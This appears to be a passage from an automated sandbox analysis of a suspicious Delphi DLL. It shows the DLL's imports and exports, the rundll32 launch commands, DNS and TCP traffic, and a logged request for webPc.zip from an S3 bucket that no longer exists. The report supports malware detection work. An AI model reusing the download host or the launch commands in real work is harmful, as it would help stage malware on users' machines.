RT_GROUP_CURSOR	0x2aa35c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x2aa370	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x2aa384	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x2aa398	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x2aa3ac	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x2aa3c0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_VERSION	0x2aa3d4	0x23c	data	English	United States	0.4493006993006993

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc, FreeLibrary
user32.dll	SetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExW, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCaretPos, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, IsCharAlphaNumericW, IsCharAlphaW, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageExtraInfo, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DeferWindowPos, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, BeginDeferWindowPos, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyPolyline, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStretchBltMode, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreatePen, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll	WriteFile, WinExec, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, TerminateProcess, SystemTimeToFileTime, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OpenProcess, MulDiv, MoveFileW, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVolumeInformationW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileMappingW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
advapi32.dll	RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll	Sleep
netapi32.dll	NetApiBufferFree, NetWkstaGetInfo
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
msvcrt.dll	memset, memcpy
shell32.dll	ShellExecuteExW, ShellExecuteW, Shell_NotifyIconW
URLMON.DLL	URLDownloadToFileW
comdlg32.dll	GetSaveFileNameW, GetOpenFileNameW
winspool.drv	OpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
winspool.drv	GetDefaultPrinterW
kernel32.dll	MulDiv
shell32.dll	IsUserAnAdmin

Exports

Name	Ordinal	Address
HackCheck	5	0x647184
ServiceCrtMain	4	0x647184
TMethodImplementationIntercept	3	0x4662f8
__dbk_fcall_wrapper	2	0x41188c
dbkFCallWrapperAddr	1	0x65d634

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 8, 2024 19:43:13.666182995 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:13.666239023 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:13.666318893 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:13.707381964 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:13.707444906 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:14.689378023 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:14.689481020 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:14.812664032 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:14.812828064 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:14.814338923 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:14.814409971 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:14.822340965 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:14.868237019 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:15.150656939 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:15.150744915 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:15.150778055 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:15.150815010 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:15.150870085 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:15.152898073 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:15.152918100 CET	443	49717	3.5.233.174	192.168.2.6
Mar 8, 2024 19:43:15.152939081 CET	49717	443	192.168.2.6	3.5.233.174
Mar 8, 2024 19:43:15.152976990 CET	49717	443	192.168.2.6	3.5.233.174

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 8, 2024 19:43:13.482597113 CET	53786	53	192.168.2.6	1.1.1.1
Mar 8, 2024 19:43:13.653276920 CET	53	53786	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 8, 2024 19:43:13.482597113 CET	192.168.2.6	1.1.1.1	0x6164	Standard query (0)	awsserver903203232.s3.sa-east-1.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 8, 2024 19:43:13.653276920 CET	1.1.1.1	192.168.2.6	0x6164	No error (0)	awsserver903203232.s3.sa-east-1.amazonaws.com	s3-r-w.sa-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 8, 2024 19:43:13.653276920 CET	1.1.1.1	192.168.2.6	0x6164	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.233.174	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:43:13.653276920 CET	1.1.1.1	192.168.2.6	0x6164	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.233.147	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:43:13.653276920 CET	1.1.1.1	192.168.2.6	0x6164	No error (0)	s3-r-w.sa-east-1.amazonaws.com		52.95.165.75	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:43:13.653276920 CET	1.1.1.1	192.168.2.6	0x6164	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.233.149	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:43:13.653276920 CET	1.1.1.1	192.168.2.6	0x6164	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.2.6	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:43:13.653276920 CET	1.1.1.1	192.168.2.6	0x6164	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.232.106	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:43:13.653276920 CET	1.1.1.1	192.168.2.6	0x6164	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.234.180	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:43:13.653276920 CET	1.1.1.1	192.168.2.6	0x6164	No error (0)	s3-r-w.sa-east-1.amazonaws.com		52.95.164.86	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

awsserver903203232.s3.sa-east-1.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49717	3.5.233.174	443	6836	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-08 18:43:14 UTC	314	OUT	GET /webPc.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: awsserver903203232.s3.sa-east-1.amazonaws.com Connection: Keep-Alive
2024-03-08 18:43:15 UTC	305	IN	HTTP/1.1 404 Not Found x-amz-request-id: JQ346M807WVPWYMH x-amz-id-2: ubI19FHlsDANi844u/osa9nS0voFgAhnlpZkMXatCQY+d7AXA0hWTnpaTCetmm4Ks7R6rUzJcgPtz154jSO2GQ1ODHJiSjvE Content-Type: application/xml Transfer-Encoding: chunked Date: Fri, 08 Mar 2024 18:43:14 GMT Server: AmazonS3 Connection: close
2024-03-08 18:43:15 UTC	340	IN	Data Raw: 31 34 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 62 75 63 6b 65 74 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 3c 2f 4d 65 73 73 61 67 65 3e 3c 42 75 63 6b 65 74 4e 61 6d 65 3e 61 77 73 73 65 72 76 65 72 39 30 33 32 30 33 32 33 32 3c 2f 42 75 63 6b 65 74 4e 61 6d 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 4a 51 33 34 36 4d 38 30 37 57 56 50 57 59 4d 48 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 75 62 49 31 39 46 48 6c 73 44 41 4e 69 38 34 34 75 2f 6f 73 61 39 6e 53 30 76 6f 46 67 41 68 6e 6c 70 5a Data Ascii: 148<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>awsserver903203232</BucketName><RequestId>JQ346M807WVPWYMH</RequestId><HostId>ubI19FHlsDANi844u/osa9nS0voFgAhnlpZ

Target ID:	0
Start time:	19:43:01
Start date:	08/03/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll"
Imagebase:	0xf60000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	19:43:01
Start date:	08/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	19:43:01
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	19:43:01
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	19:43:01
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	19:43:01
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 692
Imagebase:	0xd60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	19:43:04
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMain
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	19:43:07
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationIntercept
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	19:43:10
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheck
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	19:43:10
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMain
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	false

Target ID:	13
Start time:	19:43:10
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationIntercept
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	19:43:10
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddr
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	19:43:10
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapper
Imagebase:	0xe30000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Has exited:	true

Target ID:	18
Start time:	19:43:11
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 684
Imagebase:	0xd60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	19
Start time:	19:43:11
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 684
Imagebase:	0xd60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	19:43:14
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6836 -s 2140
Imagebase:	0xd60000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true